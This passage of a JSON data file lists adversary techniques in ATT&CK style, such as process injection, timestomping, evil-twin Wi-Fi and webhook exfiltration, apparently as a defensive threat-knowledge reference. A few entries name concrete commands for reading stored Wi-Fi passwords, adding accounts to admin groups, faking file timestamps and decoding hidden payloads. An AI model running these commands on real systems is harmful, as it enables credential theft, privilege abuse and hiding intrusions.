networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself. Mobile devices may also be used to infect PCs with malware if connected via USB. This infection may be achieved using devices (Android, iOS, etc.) and, in some instances, USB charging cables. For example, when a smartphone is connected to a system, it may appear to be mounted similar to a USB-connected disk drive. If malware that is compatible with the connected system is on the mobile device, the malware could infect the machine (especially if Autorun features are enabled).", "detection": ""}, {"attack_id": "T1005", "name": "Data from Local System", "tactics": ["collection"], "platforms": ["ESXi", "Linux", "macOS", "Network Devices", "Windows"], "description": "Adversaries may search local system sources, such as file systems, configuration files, local databases, virtual machine files, or process memory, to find files of interest and sensitive data prior to Exfiltration. Adversaries may do this using a Command and Scripting Interpreter, such as cmd as well as a Network Device CLI, which have functionality to interact with the file system to gather information. Adversaries may also use Automated Collection on the local system.", "detection": ""}, {"attack_id": "T1140", "name": "Deobfuscate/Decode Files or Information", "tactics": ["stealth"], "platforms": ["ESXi", "Linux", "macOS", "Windows"], "description": "Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system. One such example is the use of certutil to decode a remote access tool portable executable file that has been hidden inside a certificate file. Another example is using the Windows copy /b or type command to reassemble binary fragments into a malicious payload. Sometimes a user's action may be required to open it for deobfuscation or decryption as part of User Execution. The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary.", "detection": ""}, {"attack_id": "T1137.005", "name": "Outlook Rules", "tactics": ["persistence"], "platforms": ["Windows", "Office Suite"], "description": "Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user. Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.", "detection": ""}, {"attack_id": "T1586.003", "name": "Cloud Accounts", "tactics": ["resource-development"], "platforms": ["PRE"], "description": "Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for Exfiltration to Cloud Storage or to Upload Tools. Cloud accounts can also be used in the acquisition of infrastructure, such as Virtual Private Servers or Serverless infrastructure. Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or Phishing. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers. A variety of methods exist for compromising cloud accounts, such as gathering credentials via Phishing for Information, purchasing credentials from third-party sites, conducting Password Spraying attacks, or attempting to Steal Application Access Tokens. Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a Trusted Relationship between service providers and their customers.", "detection": ""}, {"attack_id": "T1586.002", "name": "Email Accounts", "tactics": ["resource-development"], "platforms": ["PRE"], "description": "Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct Phishing for Information, Phishing, or large-scale spam email campaigns. Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship with, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: Domains). A variety of methods exist for compromising email accounts, such as gathering credentials via Phishing for Information, purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials. Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. Adversaries may target compromising well-known email accounts or domains from which malicious spam or Phishing emails may evade reputation-based email filtering rules. Adversaries can use a compromised email account to hijack existing email threads with targets of interest.", "detection": ""}, {"attack_id": "T1098.007", "name": "Additional Local or Domain Groups", "tactics": ["persistence", "privilege-escalation"], "platforms": ["Windows", "macOS", "Linux"], "description": "An adversary may add additional local or domain groups to an adversary-controlled account to maintain persistent access to a system or domain. On Windows, accounts may use the `net localgroup` and `net group` commands to add existing users to local and domain groups. On Linux, adversaries may use the `usermod` command for the same purpose. For example, accounts may be added to the local administrators group on Windows devices to maintain elevated privileges. They may also be added to the Remote Desktop Users group, which allows them to leverage Remote Desktop Protocol to log into the endpoints in the future. Adversaries may also add accounts to VPN user groups to gain future persistence on the network. On Linux, accounts may be added to the sudoers group, allowing them to persistently leverage Sudo and Sudo Caching for elevated privileges. In Windows environments, machine accounts may also be added to domain groups. This allows the local SYSTEM account to gain privileges on the domain.", "detection": ""}, {"attack_id": "T1608.001", "name": "Upload Malware", "tactics": ["resource-development"], "platforms": ["PRE"], "description": "Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable Ingress Tool Transfer by placing it on an Internet accessible web server. Malware may be placed on infrastructure that was previously purchased/rented by the adversary (Acquire Infrastructure) or was otherwise compromised by them (Compromise Infrastructure). Malware can also be staged on web services, such as GitHub or Pastebin; hosted on the InterPlanetary File System (IPFS), where decentralized content storage makes the removal of malicious files difficult; or saved on the blockchain as smart contracts, which are resilient against takedowns that would affect traditional infrastructure. Adversaries may upload backdoored files, such as software packages, application binaries, virtual machine images, or container images, to third-party software stores, package libraries, extension marketplaces, or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub, PyPi, NPM). By chance encounter, victims may directly download/install these backdoored files via User Execution. Masquerading, including typosquatting legitimate software, may increase the chance of users mistakenly executing these files.", "detection": ""}, {"attack_id": "T1195", "name": "Supply Chain Compromise", "tactics": ["initial-access"], "platforms": ["Linux", "Windows", "macOS", "SaaS"], "description": "Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise can take place at any stage of the supply chain including: * Manipulation of development tools * Manipulation of a development environment * Manipulation of source code repositories (public or private) * Manipulation of source code in open-source dependencies * Manipulation of software update/distribution mechanisms * Compromised/infected system images (removable media infected at the factory) * Replacement of legitimate software with modified versions * Sales of modified/counterfeit products to legitimate distributors * Shipment interdiction While supply chain compromise can impact any component of hardware or software, adversaries looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. Adversaries may limit targeting to a desired victim set or distribute malicious software to a broad set of consumers but only follow up with specific victims. Popular open-source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency. In some cases, adversaries may conduct “second-order” supply chain compromises by leveraging the access gained from an initial supply chain compromise to further compromise a software component. This may allow the threat actor to spread to even more victims.", "detection": ""}, {"attack_id": "T1190", "name": "Exploit Public-Facing Application", "tactics": ["initial-access"], "platforms": ["Containers", "ESXi", "IaaS", "Linux", "macOS", "Network Devices", "Windows"], "description": "Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration. Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets. On ESXi infrastructure, adversaries may exploit exposed OpenSLP services; they may alternatively exploit exposed VMware vCenter servers. Depending on the flaw being exploited, this may also involve Exploitation for Stealth or Exploitation for Client Execution. If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the Cloud Instance Metadata API), exploit container host access via Escape to Host, or take advantage of weak identity and access management policies. Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses. For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.", "detection": ""}, {"attack_id": "T1558", "name": "Steal or Forge Kerberos Tickets", "tactics": ["credential-access"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable Pass the Ticket. Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC). Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access. On Windows, the built-in klist utility can be used to list and analyze cached Kerberos tickets.", "detection": ""}, {"attack_id": "T1555", "name": "Credentials from Password Stores", "tactics": ["credential-access"], "platforms": ["IaaS", "Linux", "macOS", "Windows"], "description": "Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications and services that store passwords to make them easier for users to manage and maintain, such as password managers and cloud secrets vaults. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.", "detection": ""}, {"attack_id": "T1567", "name": "Exfiltration Over Web Service", "tactics": ["exfiltration"], "platforms": ["ESXi", "Linux", "macOS", "Office Suite", "SaaS", "Windows"], "description": "Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services. Web service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.", "detection": ""}, {"attack_id": "T1219", "name": "Remote Access Tools", "tactics": ["command-and-control"], "platforms": ["Linux", "macOS", "Windows"], "description": "An adversary may use legitimate remote access tools to establish an interactive command and control channel within a network. Remote access tools create a session between two trusted hosts through a graphical interface, a command line interaction, a protocol tunnel via development or management software, or hardware-level access such as KVM (Keyboard, Video, Mouse) over IP solutions. Desktop support software (usually graphical interface) and remote management software (typically command line interface) allow a user to control a computer remotely as if they are a local user inheriting the user or software permissions. This software is commonly used for troubleshooting, software installation, and system management. Adversaries may similarly abuse response features included in EDR and other defensive tools that enable remote access. Remote access tools may be installed and used post-compromise as an alternate communications channel for redundant access or to establish an interactive remote desktop session with the target system. It may also be used as a malware component to establish a reverse connection or back-connect to a service or adversary-controlled system. Installation of many remote access tools may also include persistence (e.g., the software's installation routine creates a Windows Service). Remote access modules/features may also exist as part of otherwise existing software (e.g., Google Chrome’s Remote Desktop).", "detection": ""}, {"attack_id": "T1583.001", "name": "Domains", "tactics": ["resource-development"], "platforms": ["PRE"], "description": "Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. Adversaries may use acquired domains for a variety of purposes, including for Phishing, Drive-by Compromise, and Command and Control. Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD). Typosquatting may be used to aid in delivery of payloads via Drive-by Compromise. Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute \"IDN homograph attacks,\" creating visually similar lookalike domains used to deliver malware to victim machines. Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names). Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history. Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars. In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.", "detection": ""}, {"attack_id": "T1560.002", "name": "Archive via Library", "tactics": ["collection"], "platforms": ["Linux", "macOS", "Windows"], "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including Python rarfile , libzip , and zlib . Most libraries include functionality to encrypt and/or compress data. Some archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism.", "detection": ""}, {"attack_id": "T1055.003", "name": "Thread Execution Hijacking", "tactics": ["stealth", "privilege-escalation"], "platforms": ["Windows"], "description": "Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process. Thread Execution Hijacking is commonly performed by suspending an existing process then unmapping/hollowing its memory, which can then be replaced with malicious code or the path to a DLL. A handle to an existing victim process is first created with native Windows API calls such as OpenThread. At this point the process can be suspended then written to, realigned to the injected code, and resumed via SuspendThread , VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively. This is very similar to Process Hollowing but targets an existing process rather than creating a process in a suspended state. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process.", "detection": ""}, {"attack_id": "T1684", "name": "Social Engineering", "tactics": ["stealth"], "platforms": ["Linux", "macOS", "Office Suite", "SaaS", "Windows"], "description": "Adversaries may use social engineering techniques to influence users to take actions that result in unauthorized access, approval of changes, disclosure of sensitive information, or execution of adversary-supplied instructions (i.e., introduction of malicious payloads or software), while minimizing technical indicators. Adversaries may leverage trust-building methods across multiple channels (e.g., executive, vendor, or help desk scenarios, including AI-enabled voice interactions) to prompt user-authorized actions such as password resets, MFA changes, financial approvals, or the disclosure of sensitive information. Adversaries may also leverage common business communications and workflows such as email, collaboration platforms, voice communications, recruiting processes, help desk interactions, and SaaS consent mechanisms to make malicious requests appear routine and legitimate. Additionally, adversaries have persuaded victims to take actions through references of current events, harnessing relevant themes to the work role or the organizations mission. For example, adversaries may use scare tactics (i.e., threaten repercussions for non-compliance) or otherwise incite victims’ emotions in order to generate a sense of urgency to take action. This technique may include common social engineering patterns such as Phishing and Spearphishing Voice, often supported by convincing and targeted narratives.", "detection": ""}, {"attack_id": "T1036", "name": "Masquerading", "tactics": ["stealth"], "platforms": ["Containers", "ESXi", "Linux", "macOS", "Windows"], "description": "Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names. Renaming abusable system utilities to evade security monitoring is also a form of Masquerading.", "detection": ""}, {"attack_id": "T1546.011", "name": "Application Shimming", "tactics": ["privilege-escalation", "persistence"], "platforms": ["Windows"], "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS. A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in: * %WINDIR%\\AppPatch\\sysmain.sdb and * hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb Custom databases are stored in: * %WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom and * hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to Bypass User Account Control (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress). Utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. Shims can also be abused to establish persistence by continuously being invoked by affected programs.", "detection": ""}, {"attack_id": "T1552", "name": "Unsecured Credentials", "tactics": ["credential-access"], "platforms": ["Windows", "SaaS", "IaaS", "Linux", "macOS", "Containers", "Network Devices", "Office Suite", "Identity Provider"], "description": "Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. Shell History), operating system or application-specific repositories (e.g. Credentials in Registry), or other specialized files/artifacts (e.g. Private Keys).", "detection": ""}, {"attack_id": "T1547.010", "name": "Port Monitors", "tactics": ["persistence", "privilege-escalation"], "platforms": ["Windows"], "description": "Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. This DLL can be located in C:\\Windows\\System32 and will be loaded and run by the print spooler service, `spoolsv.exe`, under SYSTEM level permissions on boot. Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to the `Driver` value of an existing or new arbitrarily named subkey of HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. The Registry key contains entries for the following: * Local Port * Standard TCP/IP Port * USB Monitor * WSD Port", "detection": ""}, {"attack_id": "T1070.008", "name": "Clear Mailbox Data", "tactics": ["stealth"], "platforms": ["Linux", "macOS", "Office Suite", "Windows"], "description": "Adversaries may modify mail and mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails, email metadata, or logs generated by the application or operating system, such as export requests. Adversaries may manipulate emails and mailbox data to remove logs, artifacts, and metadata, such as evidence of Phishing/Internal Spearphishing, Email Collection, Mail Protocols for command and control, or email-based exfiltration such as Exfiltration Over Alternative Protocol. For example, to remove evidence on Exchange servers adversaries have used the ExchangePowerShell PowerShell module, including Remove-MailboxExportRequest to remove evidence of mailbox exports. On Linux and macOS, adversaries may also delete emails through a command line utility called mail or use AppleScript to interact with APIs on macOS. Adversaries may also remove emails and metadata/headers indicative of spam or suspicious activity (for example, through the use of organization-wide transport rules) to reduce the likelihood of malicious emails being detected by security products.", "detection": ""}, {"attack_id": "T1037.002", "name": "Login Hook", "tactics": ["persistence", "privilege-escalation"], "platforms": ["macOS"], "description": "Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific script to execute with root privileges upon user logon. The plist file is located in the /Library/Preferences/com.apple.loginwindow.plist file and can be modified using the defaults command-line utility. This behavior is the same for logout hooks where a script can be executed upon user logout. All hooks require administrator permissions to modify or create hooks. Adversaries can add or insert a path to a malicious script in the com.apple.loginwindow.plist file, using the LoginHook or LogoutHook key-value pair. The malicious script is executed upon the next user login. If a login hook already exists, adversaries can add additional commands to an existing login hook. There can be only one login and logout hook on a system at a time. **Note:** Login hooks were deprecated in 10.11 version of macOS in favor of Launch Daemon and Launch Agent", "detection": ""}, {"attack_id": "T1659", "name": "Content Injection", "tactics": ["initial-access", "command-and-control"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may gain access and continuously communicate with victims by injecting malicious content into systems through online network traffic. Rather than luring victims to malicious payloads hosted on a compromised website (i.e., Drive-by Target followed by Drive-by Compromise), adversaries may initially access victims through compromised data-transfer channels where they can manipulate traffic and/or inject their own content. These compromised online network channels may also be used to deliver additional payloads (i.e., Ingress Tool Transfer) and other data to already compromised systems. Adversaries may inject content to victim systems in various ways, including: * From the middle, where the adversary is in-between legitimate online client-server communications (**Note:** this is similar but distinct from Adversary-in-the-Middle, which describes AiTM activity solely within an enterprise environment) * From the side, where malicious content is injected and races to the client as a fake response to requests of a legitimate online server Content injection is often the result of compromised upstream communication channels, for example at the level of an internet service provider (ISP) as is the case with \"lawful interception.\"", "detection": ""}, {"attack_id": "T1055", "name": "Process Injection", "tactics": ["stealth", "privilege-escalation"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. There are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.", "detection": ""}, {"attack_id": "T1567.004", "name": "Exfiltration Over Webhook", "tactics": ["exfiltration"], "platforms": ["ESXi", "Linux", "macOS", "Office Suite", "SaaS", "Windows"], "description": "Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel. Webhooks are simple mechanisms for allowing a server to push data over HTTP/S to a client without the need for the client to continuously poll the server. Many public and commercial services, such as Discord, Slack, and `webhook.site`, support the creation of webhook endpoints that can be used by other services, such as Github, Jira, or Trello. When changes happen in the linked services (such as pushing a repository update or modifying a ticket), these services will automatically post the data to the webhook endpoint for use by the consuming application. Adversaries may link an adversary-owned environment to a victim-owned SaaS service to achieve repeated Automated Exfiltration of emails, chat messages, and other data. Alternatively, instead of linking the webhook endpoint to a service, an adversary can manually post staged data directly to the URL in order to exfiltrate it. Access to webhook endpoints is often over HTTPS, which gives the adversary an additional level of protection. Exfiltration leveraging webhooks can also blend in with normal network traffic if the webhook endpoint points to a commonly used SaaS application or collaboration service.", "detection": ""}, {"attack_id": "T1205", "name": "Traffic Signaling", "tactics": ["stealth", "persistence", "command-and-control"], "platforms": ["Linux", "macOS", "Network Devices", "Windows"], "description": "Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. Port Knocking), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software. Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s). The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r , is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. On network devices, adversaries may use crafted packets to enable Network Device Authentication for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities. Adversaries may use crafted packets to attempt to connect to one or more (open or closed) ports, but may also attempt to connect to a router interface, broadcast, and network address IP on the same port in order to achieve their goals and objectives. To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage Patch System Image due to the monolithic nature of the architecture. Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.", "detection": ""}, {"attack_id": "T1021.008", "name": "Direct Cloud VM Connections", "tactics": ["lateral-movement"], "platforms": ["IaaS"], "description": "Adversaries may leverage Valid Accounts to log directly into accessible cloud hosted compute infrastructure through cloud native methods. Many cloud providers offer interactive connections to virtual infrastructure that can be accessed through the Cloud API, such as Azure Serial Console, AWS EC2 Instance Connect, and AWS System Manager.. Methods of authentication for these connections can include passwords, application access tokens, or SSH keys. These cloud native methods may, by default, allow for privileged access on the host with SYSTEM or root level access. Adversaries may utilize these cloud native methods to directly access virtual infrastructure and pivot through an environment. These connections typically provide direct console access to the VM rather than the execution of scripts (i.e., Cloud Administration Command).", "detection": ""}, {"attack_id": "T1218", "name": "System Binary Proxy Execution", "tactics": ["stealth"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system. Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands. Similarly, on Linux systems adversaries may abuse trusted binaries such as split to proxy execution of malicious commands.", "detection": ""}, {"attack_id": "T1070.006", "name": "Timestomp", "tactics": ["stealth"], "platforms": ["ESXi", "Linux", "macOS", "Windows"], "description": "Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files. In Windows systems, both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file. `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel. Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file. Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously. In Linux systems and on ESXi servers, threat actors may attempt to perform timestomping using commands such as `touch -a -m -t ` (which sets access and modification times to a specific value) or `touch -r ` (which sets access and modification times to match those of another file). Timestomping may be used along with file name Masquerading to hide malware and tools.", "detection": ""}, {"attack_id": "T1557.004", "name": "Evil Twin", "tactics": ["credential-access", "collection"], "platforms": ["Network Devices"], "description": "Adversaries may host seemingly genuine Wi-Fi access points to deceive users into connecting to malicious networks as a way of supporting follow-on behaviors such as Network Sniffing, Transmitted Data Manipulation, or Input Capture. By using a Service Set Identifier (SSID) of a legitimate Wi-Fi network, fraudulent Wi-Fi access points may trick devices or users into connecting to malicious Wi-Fi networks. Adversaries may provide a stronger signal strength or block access to Wi-Fi access points to coerce or entice victim devices into connecting to malicious networks. A Wi-Fi Pineapple – a network security auditing and penetration testing tool – may be deployed in Evil Twin attacks for ease of use and broader range. Custom certificates may be used in an attempt to intercept HTTPS traffic. Similarly, adversaries may also listen for client devices sending probe requests for known or previously connected networks (Preferred Network Lists or PNLs). When a malicious access point receives a probe request, adversaries can respond with the same SSID to imitate the trusted, known network. Victim devices are led to believe the responding access point is from their PNL and initiate a connection to the fraudulent network. Upon logging into the malicious Wi-Fi access point, a user may be directed to a fake login page or captive portal webpage to capture the victim’s credentials. Once a user is logged into the fraudulent Wi-Fi network, the adversary may able to monitor network activity, manipulate data, or steal additional credentials. Locations with high concentrations of public Wi-Fi access, such as airports, coffee shops, or libraries, may be targets for adversaries to set up illegitimate Wi-Fi access points.", "detection": ""}, {"attack_id": "T1620", "name": "Reflective Code Loading", "tactics": ["stealth"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk (e.g., Shared Modules). Reflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode). For example, the `Assembly.Load()` method executed by PowerShell may be abused to load raw code into the running process. Reflective code injection is very similar to Process Injection except that the “injection” loads code into the processes’ own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.", "detection": ""}, {"attack_id": "T1016.002", "name": "Wi-Fi Discovery", "tactics": ["discovery"], "platforms": ["Linux", "Windows", "macOS"], "description": "Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of Account Discovery, Remote System Discovery, and other discovery or Credential Access activity to support both ongoing and future campaigns. Adversaries may collect various types of information about Wi-Fi networks from hosts. For example, on Windows names and passwords of all Wi-Fi networks a device has previously connected to may be available through `netsh wlan show profiles` to enumerate Wi-Fi names and then `netsh wlan show profile “Wi-Fi name” key=clear` to show a Wi-Fi network’s corresponding password. Additionally, names and other details of locally reachable Wi-Fi networks can be discovered using calls to `wlanAPI.dll` Native API functions. On Linux, names and passwords of all Wi-Fi-networks a device has previously connected to may be available in files under ` /etc/NetworkManager/system-connections/`. On macOS, the password of a known Wi-Fi may be identified with ` security find-generic-password -wa wifiname` (requires admin username/password).", "detection": ""}, {"attack_id": "T1480.002", "name": "Mutual Exclusion", "tactics": ["stealth"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time. While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes. By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised. In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself. Mutex names may be hard-coded or dynamically generated using a predictable algorithm.", "detection": ""}, {"attack_id": "T1564.011", "name": "Ignore Process Interrupts", "tactics": ["stealth"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may evade defensive mechanisms by executing commands that hide from process interrupt signals. Many operating systems use signals to deliver messages to control process behavior. Command interpreters often include specific commands/flags that ignore errors and other hangups, such as when the user of the active session logs off. These interrupt signals may also be used by defensive tools and/or analysts to pause or terminate specified running processes. Adversaries may invoke processes using `nohup`, PowerShell `-ErrorAction SilentlyContinue`, or similar commands that may be immune to hangups. This may enable malicious commands and malware to continue execution through system events that would otherwise terminate its execution, such as users logging off or the termination of its C2 network connection. Hiding from process interrupt 